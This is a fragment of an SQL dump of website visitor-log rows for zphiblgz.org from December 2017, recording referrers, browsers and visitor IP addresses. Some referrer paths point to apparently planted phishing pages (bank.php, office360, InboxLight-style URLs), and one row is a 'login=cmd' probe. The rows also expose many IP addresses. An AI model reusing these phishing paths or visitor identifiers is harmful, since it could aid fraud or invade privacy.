14943,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.41.228','000',1,0),(14944,'2017-12-06','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(14945,'2017-12-06','https://zphiblgz.org','Safari','iPhone','9.0','','54.72.16.83','000',1,0),(14946,'2017-12-06','https://zphiblgz.org','MSIE','Windows','11.0','','208.98.49.44','000',1,0),(14947,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.44','000',2,0),(14948,'2017-12-06','https://zphiblgz.org/office360/','Firefox','Macintosh','12.0','','5.62.56.255','000',1,0),(14949,'2017-12-06','https://zphiblgz.org/cache/hot18/bank.php','MSIE','Windows','10.0','','196.54.55.27','000',22,0),(14950,'2017-12-06','https://zphiblgz.org/cache/hot18/ba1c32imqnnigljrpvxndyzy.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Windows','62.0.3202.94','','104.236.185.29','000',1,0),(14951,'2017-12-06','https://zphiblgz.org/cache/hot18/ba1c32imqnnigljrpvxndyzy.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Safari','iPhone','11.0','','87.112.157.214','000',1,0),(14952,'2017-12-06','https://zphiblgz.org/cache/hot18/fkuz9qqwkvaf9pf7x1apg84q.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Safari','iPhone','11.0','','46.101.94.163','000',1,0),(14953,'2017-12-06','https://zphiblgz.org/cache/hot18/ba1c32imqnnigljrpvxndyzy.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Android','34.0.1847.114','','46.101.119.24','000',1,0),(14954,'2017-12-06','https://zphiblgz.org/cache/hot18/fkuz9qqwkvaf9pf7x1apg84q.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Edge','Windows','15.15063','','87.112.157.214','000',1,0),(14955,'2017-12-06','https://zphiblgz.org/cache/hot18/fkuz9qqwkvaf9pf7x1apg84q.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Safari','iPhone','11.0','','104.236.185.29','000',1,0),(14956,'2017-12-06','https://www.google.com/','Chrome','Android','38.0.2125.102','','66.102.8.38','000',1,0),(14957,'2017-12-06','https://www.google.com/','Chrome','Android','38.0.2125.102','','66.102.8.44','000',2,0),(14958,'2017-12-06','https://zphiblgz.org','Chrome','Macintosh','6.0.472.63','','86.53.250.54','000',1,0),(14959,'2017-12-06','https://zphiblgz.org','Chrome','Windows','51.0.2704.106','','117.27.59.155','000',6,0),(14960,'2017-12-06','https://zphiblgz.org','Safari','Linux','538.1','','91.103.66.203','000',18,0),(14961,'2017-12-06','https://zphiblgz.org','Safari','iPhone','10.0','','174.205.4.65','000',2,0),(14962,'2017-12-06','https://loading-please-waiting37.blogspot.ru/','Safari','Linux','538.1','','91.103.66.202','000',27,0),(14963,'2017-12-06','https://zphiblgz.org','MSIE','Windows','8.0','','209.222.83.71','000',2,0),(14964,'2017-12-06','https://zphiblgz.org','Java','Unknown','1.6.0','','69.164.111.198','000',3,0),(14965,'2017-12-06','https://zphiblgz.org','MSIE','Windows','8.0','','69.164.111.198','000',9,0),(14966,'2017-12-06','https://zphiblgz.org','Firefox','Linux','49.0','','107.161.18.175','000',5,0),(14967,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.70.226','000',1,0),(14968,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',1,0),(14969,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.64.212','000',2,0),(14970,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.67.180','000',1,0),(14971,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.63','000',1,0),(14972,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.40.233','000',1,0),(14973,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.200.120.26','000',1,0),(14974,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.78','000',2,0),(14975,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','137.74.73.179','000',1,0),(14976,'2017-12-06','https://zphiblgz.org','Firefox','Linux','10.0','','1.171.52.205','000',1,0),(14977,'2017-12-06','http://zphiblgz.org/scholarship/','Chrome','Macintosh','61.0.3163.100','','71.179.100.71','000',1,0),(14978,'2017-12-06','https://zphiblgz.org','Safari','Linux','534.34','','185.62.189.55','000',2,0),(14979,'2017-12-06','https://zphiblgz.org','Chrome','Windows','37.0.2062.63','','198.12.108.126','000',2,0),(14980,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','37.187.94.86','000',1,0),(14981,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','212.21.66.6','000',1,0),(14982,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.54.136','000',1,0),(14983,'2017-12-06','https://zphiblgz.org','Firefox','Windows','46.0','','146.185.223.25','000',2,0),(14984,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.176.4.10','000',1,0),(14985,'2017-12-06','http://www.google.com/','Chrome','Android','62.0.3202.84','','73.232.181.232','000',3,0),(14986,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','85.93.218.204','000',2,0),(14987,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.63.43','000',1,0),(14988,'2017-12-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','18.194.222.6','000',3,0),(14989,'2017-12-06','http://site.ru','Chrome','Windows','5.0.375.99','','108.167.157.233','000',1,0),(14990,'2017-12-06','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.195.134','000',4,0),(14991,'2017-12-06','https://b-m.facebook.com/','Chrome','Android','63.0.3239.83','','71.244.137.250','000',15,0),(14992,'2017-12-07','https://zphiblgz.org/service/','Chrome','Android','63.0.3239.83','','71.244.137.250','000',14,0),(14993,'2017-12-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','165.227.93.247','000',2,0),(14994,'2017-12-07','https://zphiblgz.org','Firefox','Linux','48.0','','165.227.93.247','000',1,0),(14995,'2017-12-07','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',92,0),(14996,'2017-12-07','http://site.ru','Chrome','Windows','5.0.375.99','','77.74.51.110','000',1,0),(14997,'2017-12-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','104.218.63.73','000',2,0),(14998,'2017-12-07','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.87.154.255','000',1,0),(14999,'2017-12-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','155.4.230.97','000',2,0),(15000,'2017-12-07','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.104.120.7','000',1,0),(15001,'2017-12-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(15002,'2017-12-07','https://zphiblgz.org','Chrome','Android','34.0.1847.114','','116.62.43.162','000',5,0),(15003,'2017-12-07','https://zphiblgz.org','Chrome','Android','57.0.2987.98','','183.94.24.208','000',1,0),(15004,'2017-12-07','http://zphiblgz.org/F0x.htm','Chrome','Android','57.0.2987.98','','59.175.41.170','000',1,0),(15005,'2017-12-07','https://zphiblgz.org','Chrome','Android','57.0.2987.98','','183.94.26.245','000',4,0),(15006,'2017-12-07','http://site.ru','Chrome','Windows','5.0.375.99','','87.236.20.136','000',2,0),(15007,'2017-12-07','https://zphiblgz.org','Firefox','Linux','47.0','','218.25.39.56','000',1,0),(15008,'2017-12-07','https://zphiblgz.org','Firefox','Windows','40.1','','190.17.198.122','000',3,0),(15009,'2017-12-07','https://lm.facebook.com/','Chrome','Android','62.0.3202.84','','174.204.20.46','000',3,0),(15010,'2017-12-07','https://zphiblgz.org','MSIE','Windows','6.0','','185.30.99.2','000',1,0),(15011,'2017-12-07','http://site.ru','Chrome','Windows','5.0.375.99','','5.189.173.36','000',2,0),(15012,'2017-12-07','http://site.ru','Chrome','Windows','5.0.375.99','','83.172.144.143','000',2,0),(15013,'2017-12-07','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','210.245.14.137','000',3,0),(15014,'2017-12-07','https://www.google.com/','Chrome','Android','56.0.2924.87','','66.102.6.166','000',1,0),(15015,'2017-12-07','https://www.google.com/','Chrome','Android','56.0.2924.87','','66.102.6.172','000',1,0),(15016,'2017-12-07','https://zphiblgz.org/','Chrome','Android','56.0.2924.87','','66.102.6.168','000',1,0),(15017,'2017-12-07','https://zphiblgz.org','MSIE','Windows','11.0','','128.220.160.1','000',4,0),(15018,'2017-12-07','https://zphiblgz.org','Safari','Macintosh','10.1.2','','71.179.81.192','000',4,0),(15019,'2017-12-07','https://www.google.com/','Chrome','Windows','62.0.3202.94','','152.26.209.24','000',4,0),(15020,'2017-12-07','http://site.ru','Chrome','Windows','5.0.375.99','','112.213.91.163','000',4,0),(15021,'2017-12-07','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','54.159.148.202','000',2,0),(15022,'2017-12-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(15023,'2017-12-07','https://zphiblgz.org','Firefox','Windows','40.1','','197.19.199.45','000',3,0),(15024,'2017-12-07','http://site.ru','Chrome','Windows','5.0.375.99','','82.100.220.39','000',2,0),(15025,'2017-12-07','http://site.ru','Chrome','Windows','5.0.375.99','','85.128.142.21','000',5,0),(15026,'2017-12-07','http://site.ru','Chrome','Windows','5.0.375.99','','103.67.235.72','000',1,0),(15027,'2017-12-07','https://zphiblgz.org/','Safari','iPhone','10.0','','174.205.10.227','000',1,0),(15028,'2017-12-07','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(15029,'2017-12-07','https://zphiblgz.org','Python','Unknown','3.6','','54.171.75.121','000',2,0),(15030,'2017-12-07','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.65','000',2,0),(15031,'2017-12-07','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.2','000',1,0),(15032,'2017-12-07','https://www.google.com/','Chrome','iPhone','62.0.3202.70','','100.15.160.57','000',6,0),(15033,'2017-12-07','https://zphiblgz.org','MSIE','Windows','11.0','','34.209.175.187','000',2,0),(15034,'2017-12-07','https://zphiblgz.org','MSIE','Windows','11.0','','42.150.195.139','000',2,0),(15035,'2017-12-07','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','80.211.152.242','000',1,0),(15036,'2017-12-08','https://zphiblgz.org','Chrome','Android','48.0.2564.23','','114.55.53.166','000',1,0),(15037,'2017-12-08','https://zphiblgz.org','Chrome','Windows','49.0.2623.108','','114.55.53.166','000',1,0),(15038,'2017-12-08','https://zphiblgz.org','Safari','iPhone','9.0','','114.55.53.166','000',1,0),(15039,'2017-12-08','https://zphiblgz.org','Chrome','Windows','49.0.2623.108','','120.27.134.250','000',1,0),(15040,'2017-12-08','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','195.154.133.147','000',2,0),(15041,'2017-12-08','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',45,0),(15042,'2017-12-08','https://zphiblgz.org','MSIE','Windows','6.0','','204.101.161.159','000',2,0),(15043,'2017-12-08','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1629.pTu0_wudqLnZIAZMN1AoNsfoOGGKccOy0xBhNIWqc_DczoSta9pn5wEAJzXUjOyY.2380b6ea8ba45d014193153b9056ca06859d1112&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YL_nDC5hqtEQ6WayFoZKRZE&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIVlE5M1MxRWZoT3pYeDFfMF8yY0kyVFM5Wjl3MnNtblUwTzBaTU55X0JIcXI2TGJvU0I4VzZx&b64e=2&sign=816714a257741789e13570f78ec1bfa9&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4W--gC-gyaf626s1V1jXYc-K47QZmiXR4A_uBnLloy2wIIPSNT7dbROEKr4zXRrFc754dczkGqvsEhM6MFLJnXcOIs7o0J2MUCkvPF74WqEdw1X8F65cxdzs4PUb7viDY&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVklTTo7sHn7KyXinbJi8ahqtoDsNrQpIBK7e7x2G8bltNfZvarCZYl2njTpwTYMBlwgocfIbhH_Q&l10n=ru&cts=1512713344534&mc=5.21447814223','MSIE','Windows','10.0','','188.32.189.202','000',1,0),(15044,'2017-12-08','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.23','000',2,0),(15045,'2017-12-08','https://zphiblgz.org/author/przphiblgz-org/','Safari','iPhone','11.0','','69.140.240.88','000',1,0),(15046,'2017-12-08','https://zphiblgz.org','Firefox','Windows','34.0','','195.191.131.130','000',1,0),(15047,'2017-12-08','http://site.ru','Chrome','Windows','5.0.375.99','','66.147.244.80','000',2,0),(15048,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','193.110.157.151','000',1,0),(15049,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',3,0),(15050,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','37.187.96.78','000',1,0),(15051,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.36.27.7','000',3,0),(15052,'2017-12-08','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.100.149.189','000',1,0),(15053,'2017-12-08','http://site.ru','Chrome','Windows','5.0.375.99','','194.177.21.141','000',1,0),(15054,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','18.85.22.204','000',1,0),(15055,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','109.201.133.100','000',2,0),(15056,'2017-12-08','https://zphiblgz.org','Safari','iPhone','11.0','','216.99.180.242','000',2,0),(15057,'2017-12-08','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(15058,'2017-12-08','http://zphiblgz.org/','MSIE','Windows','11.0','','81.171.56.205','000',1,0),(15059,'2017-12-08','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','62.210.177.87','000',2,0),(15060,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.9','000',2,0),(15061,'2017-12-08','https://zphiblgz.org','Firefox','Windows','40.1','','31.17.123.78','000',3,0),(15062,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.163.85','000',2,0),(15063,'2017-12-08','http://zphiblgz.org/','Firefox','Windows','7.0.1','','216.218.222.12','000',1,0),(15064,'2017-12-08','http://site.ru','Chrome','Windows','5.0.375.99','','185.98.7.164','000',1,0),(15065,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','37.139.8.104','000',1,0),(15066,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','41.206.188.206','000',2,0),(15067,'2017-12-08','zphiblgz.org','Chrome','Windows','58.0.1145.75','','196.47.64.42','000',1,0),(15068,'2017-12-08','http://site.ru','Chrome','Windows','5.0.375.99','','193.202.110.22','000',1,0),(15069,'2017-12-08','http://site.ru','Chrome','Windows','5.0.375.99','','54.201.138.117','000',1,0),(15070,'2017-12-08','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(15071,'2017-12-08','https://zphiblgz.org','MSIE','Windows','11.0','','96.5.120.250','000',12,0),(15072,'2017-12-08','https://zphiblgz.org','MSIE','Windows','11.0','','137.200.32.38','000',7,0),(15073,'2017-12-08','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(15074,'2017-12-08','https://zphiblgz.org','Firefox','Windows','40.1','','78.49.244.0','000',3,0),(15075,'2017-12-08','https://zphiblgz.org','MSIE','Windows','11.0','','65.246.8.10','000',1,0),(15076,'2017-12-08','https://zphiblgz.org','MSIE','Windows','11.0','','208.87.234.180','000',6,0),(15077,'2017-12-08','http://site.ru','Chrome','Windows','5.0.375.99','','62.75.163.62','000',2,0),(15078,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.219.3.47','000',3,0),(15079,'2017-12-08','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.220.101.13','000',1,0),(15080,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.94.110.37','000',3,0),(15081,'2017-12-08','https://zphiblgz.org','Chrome','Chrome OS','62.0.3202.97','','69.143.35.179','000',6,0),(15082,'2017-12-08','http://zphiblgz.org/','Firefox','Windows','7.0.1','','162.213.3.221','000',1,0),(15083,'2017-12-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.49.102.225','000',1,0),(15084,'2017-12-08','https://lm.facebook.com/','Safari','iPhone','11.0','','174.205.11.19','000',3,0),(15085,'2017-12-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.63.197.201','000',1,0),(15086,'2017-12-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.224.163','000',1,0),(15087,'2017-12-08','https://zphiblgz.org','Safari','iPhone','11.0','','69.250.75.5','000',2,0),(15088,'2017-12-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','192.138.189.160','000',1,0),(15089,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',1,0),(15090,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',1,0),(15091,'2017-12-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','23.91.70.28','000',1,0),(15092,'2017-12-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','74.208.16.37','000',1,0),(15093,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','193.15.16.4','000',1,0),(15094,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','212.83.40.239','000',1,0),(15095,'2017-12-08','http://site.ru','Chrome','Windows','5.0.375.99','','91.134.132.17','000',2,0),(15096,'2017-12-08','http://site.ru','Chrome','Windows','5.0.375.99','','69.195.124.62','000',1,0),(15097,'2017-12-08','http://site.ru','Chrome','Windows','5.0.375.99','','151.236.44.148','000',2,0),(15098,'2017-12-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(15099,'2017-12-08','http://site.ru','Chrome','Windows','5.0.375.99','','212.34.144.3','000',1,0),(15100,'2017-12-08','https://zphiblgz.org','Firefox','Windows','15.0a1','','174.127.133.21','000',1,0),(15101,'2017-12-09','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',27,0),(15102,'2017-12-09','https://zphiblgz.org','Firefox','Macintosh','52.0','','71.179.25.190','000',4,0),(15103,'2017-12-09','http://site.ru','Chrome','Windows','5.0.375.99','','136.243.239.230','000',1,0),(15104,'2017-12-09','http://site.ru','Chrome','Windows','5.0.375.99','','91.134.248.235','000',3,0),(15105,'2017-12-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','218.251.112.158','000',1,0),(15106,'2017-12-09','http://site.ru','Chrome','Windows','5.0.375.99','','194.54.82.142','000',2,0),(15107,'2017-12-09','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',1,0),(15108,'2017-12-09','http://site.ru','Chrome','Windows','5.0.375.99','','166.62.119.173','000',2,0),(15109,'2017-12-09','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(15110,'2017-12-09','https://www.google.com/','Chrome','Linux','62.0.3202.94','','96.83.83.118','000',3,0),(15111,'2017-12-09','https://zphiblgz.org','Chrome','Windows','34.0.1847.116','','146.185.144.64','000',2,0),(15112,'2017-12-09','https://www.google.com/','Chrome','iPhone','62.0.3202.70','','173.69.178.209','000',5,0),(15113,'2017-12-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',4,0),(15114,'2017-12-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(15115,'2017-12-09','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','108.3.163.177','000',5,0),(15116,'2017-12-09','https://zphiblgz.org','Safari','iPhone','9.0','','60.1.126.130','000',1,0),(15117,'2017-12-09','https://zphiblgz.org','Safari','iPhone','9.0','','175.42.1.134','000',1,0),(15118,'2017-12-09','https://zphiblgz.org','Edge','Windows','15.15063','','40.77.170.90','000',2,0),(15119,'2017-12-09','https://www.google.com/','Edge','Windows','15.15063','','71.121.248.17','000',2,0),(15120,'2017-12-09','https://www.google.com/','Chrome','Android','56.0.2924.87','','99.203.16.226','000',2,0),(15121,'2017-12-09','https://zphiblgz.org','Chrome','Windows','62.0.3177.0','','105.105.232.183','000',2,0),(15122,'2017-12-09','https://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','185.189.112.165','000',2,0),(15123,'2017-12-09','http://site.ru','Chrome','Windows','5.0.375.99','','178.210.90.90','000',2,0),(15124,'2017-12-09','http://l.instagram.com/?u=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarships&e=ATMAAavANbWAtCcGaa34jbE9W5xUALOMc59G2ybnRNh-ZD-GBYbQwBkysLPdSvBWrqxqGr7YkPNi4yuu','AppleWebKit','iPhone','604.3.5','','68.134.7.52','000',3,0),(15125,'2017-12-09','http://site.ru','Chrome','Windows','5.0.375.99','','81.93.103.201','000',2,0),(15126,'2017-12-09','http://site.ru','Chrome','Windows','5.0.375.99','','85.128.142.67','000',2,0),(15127,'2017-12-09','http://site.ru','Chrome','Windows','5.0.375.99','','212.192.196.7','000',2,0),(15128,'2017-12-09','https://www.google.com/','Safari','iPhone','11.0','','99.203.17.126','000',2,0),(15129,'2017-12-09','https://zphiblgz.org','Safari','iPhone','11.0','','71.121.244.120','000',11,0),(15130,'2017-12-09','https://zphiblgz.org','Safari','Macintosh','11.0.1','','71.121.244.120','000',16,0),(15131,'2017-12-09','https://zphiblgz.org','MSIE','Windows','6.0','','46.161.9.18','000',9,0),(15132,'2017-12-09','https://zphiblgz.org','MSIE','Windows','6.0','','217.147.170.28','000',1,0),(15133,'2017-12-09','https://zphiblgz.org','MSIE','Windows','6.0','','185.30.99.2','000',1,0),(15134,'2017-12-10','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',48,0),(15135,'2017-12-10','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',2,0),(15136,'2017-12-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.219.3.47','000',1,0),(15137,'2017-12-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.20','000',1,0),(15138,'2017-12-10','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.220.101.6','000',1,0),(15139,'2017-12-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.30','000',1,0),(15140,'2017-12-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.86.182','000',1,0),(15141,'2017-12-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.80.148','000',2,0),(15142,'2017-12-10','https://zphiblgz.org','Safari','iPhone','9.0','','36.248.61.244','000',1,0),(15143,'2017-12-10','https://zphiblgz.org','Safari','iPhone','9.0','','113.63.84.247','000',1,0),(15144,'2017-12-10','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1631.nTwBRH3Fya_KmpVqmMwDL6i_LpzMBga0XCRD_ek8aoWUWRwDHZaIeROsy76daCoC.a7aa1a00e46c2f889d9e834325b2fd440d147c76&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWTFpUeUVaNjZCRU9BYW1ENmNBQV9qeHBiOVk5MnYyRmdIOXhCRGtTNWs2TlZfUFRkRnN0YnBQQWltb3ZlaVBOTFRxU1podVl1NHlaZw&b64e=2&sign=4d495e246fd5333c5d36ab136190cd00&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbi2OXaPJEo5u904hYpPcivu9GhWccOfwQwXoAL4Xc7iSEL8jgQ7IH3iToQXvYTcLE217zsdCO0I582qdZ0tea1eG1OvWJX2C1JNFiEoRJ25WqbODVNEGmzHuKj9RK8_K18&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXvzya1eNB8qsUUafU51u_bdmEYOBKSmRBNUr6aZFia8WWTsOco6X10hjYtWcHSHrnKuw0V4T-5Fw&l10n=ru&cts=1512902433127&mc=7.16794979767','MSIE','Windows','8.0','','95.24.16.51','000',1,0),(15145,'2017-12-10','http://zphiblgz.org/','Chrome','Macintosh','58.0.3029.110','','163.172.4.153','000',1,0),(15146,'2017-12-10','https://zphiblgz.org/','Firefox','Linux','53.0','','163.172.4.153','000',1,0),(15147,'2017-12-10','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','104.236.199.171','000',2,0),(15148,'2017-12-10','https://zphiblgz.org','Firefox','Windows','40.1','','46.32.104.218','000',3,0),(15149,'2017-12-10','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.114.196','000',2,0),(15150,'2017-12-10','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.23.145','000',2,0),(15151,'2017-12-10','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.114.54','000',2,0),(15152,'2017-12-10','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.115.108','000',2,0),(15153,'2017-12-10','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.1.157','000',2,0),(15154,'2017-12-10','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.205.58','000',1,0),(15155,'2017-12-10','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.207.250','000',2,0),(15156,'2017-12-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.105.116','000',1,0),(15157,'2017-12-10','https://zphiblgz.org','Chrome','Linux','43.0.2357.130','','95.211.38.161','000',2,0),(15158,'2017-12-10','https://zphiblgz.org','M','Unknown','Unknown','','207.182.140.210','000',2,0),(15159,'2017-12-10','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(15160,'2017-12-10','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','104.168.146.167','000',1,0),(15161,'2017-12-10','https://zphiblgz.org','Safari','iPhone','9.0','','18.217.120.146','000',1,0),(15162,'2017-12-10','http://zphiblgz.org/scholarship/','Chrome','Windows','58.0.3029.81','','178.137.83.166','000',2,0),(15163,'2017-12-10','https://zphiblgz.org','Chrome','Windows','31.0.1650.57','','144.76.80.151','000',2,0),(15164,'2017-12-10','https://zphiblgz.org','MSIE','Windows','9.0','','88.198.22.8','000',2,0),(15165,'2017-12-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.74.253','000',1,0),(15166,'2017-12-10','https://zphiblgz.org','Chrome','Windows','34.0.1797.2','','213.239.205.118','000',2,0),(15167,'2017-12-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',1,0),(15168,'2017-12-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.9','000',2,0),(15169,'2017-12-10','https://zphiblgz.org','Firefox','Windows','19.0','','185.220.101.17','000',14,0),(15170,'2017-12-10','https://zphiblgz.org','Firefox','Windows','19.0','','166.70.207.2','000',1,0),(15171,'2017-12-10','https://zphiblgz.org','Firefox','Windows','19.0','','94.142.242.84','000',1,0),(15172,'2017-12-11','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',219,0),(15173,'2017-12-11','https://zphiblgz.org','Firefox','Windows','40.1','','110.169.104.36','000',3,0),(15174,'2017-12-11','http://zphiblgz.org/login.php?login=cmd','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(15175,'2017-12-11','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(15176,'2017-12-11','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',2,0),(15177,'2017-12-11','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(15178,'2017-12-11','http://site.ru','Chrome','Windows','5.0.375.99','','173.254.28.81','000',1,0),(15179,'2017-12-11','http://site.ru','Chrome','Windows','5.0.375.99','','193.239.44.195','000',2,0),(15180,'2017-12-11','https://www.google.com/','Chrome','Windows','62.0.3202.94','','204.126.132.241','000',5,0),(15181,'2017-12-11','android-app://com.google.android.googlequicksearchbox','Chrome','Android','63.0.3239.83','','126.188.21.220','000',1,0),(15182,'2017-12-11','https://zphiblgz.org','MSIE','Windows','11.0','','155.220.250.114','000',3,0),(15183,'2017-12-11','https://zphiblgz.org','Firefox','Windows','40.1','','144.48.108.164','000',3,0),(15184,'2017-12-11','http://site.ru','Chrome','Windows','5.0.375.99','','178.210.90.90','000',2,0),(15185,'2017-12-11','https://zphiblgz.org','Safari','Macintosh','5.0.5','','85.17.14.20','000',14,0),(15186,'2017-12-11','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','95.85.8.153','000',4,0),(15187,'2017-12-11','https://zphiblgz.org','FS','Unknown','Unknown','','95.85.8.153','000',2,0),(15188,'2017-12-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0)